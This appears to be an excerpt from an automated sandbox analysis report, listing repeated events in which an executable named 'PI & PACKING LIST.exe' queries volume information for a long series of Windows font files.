Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
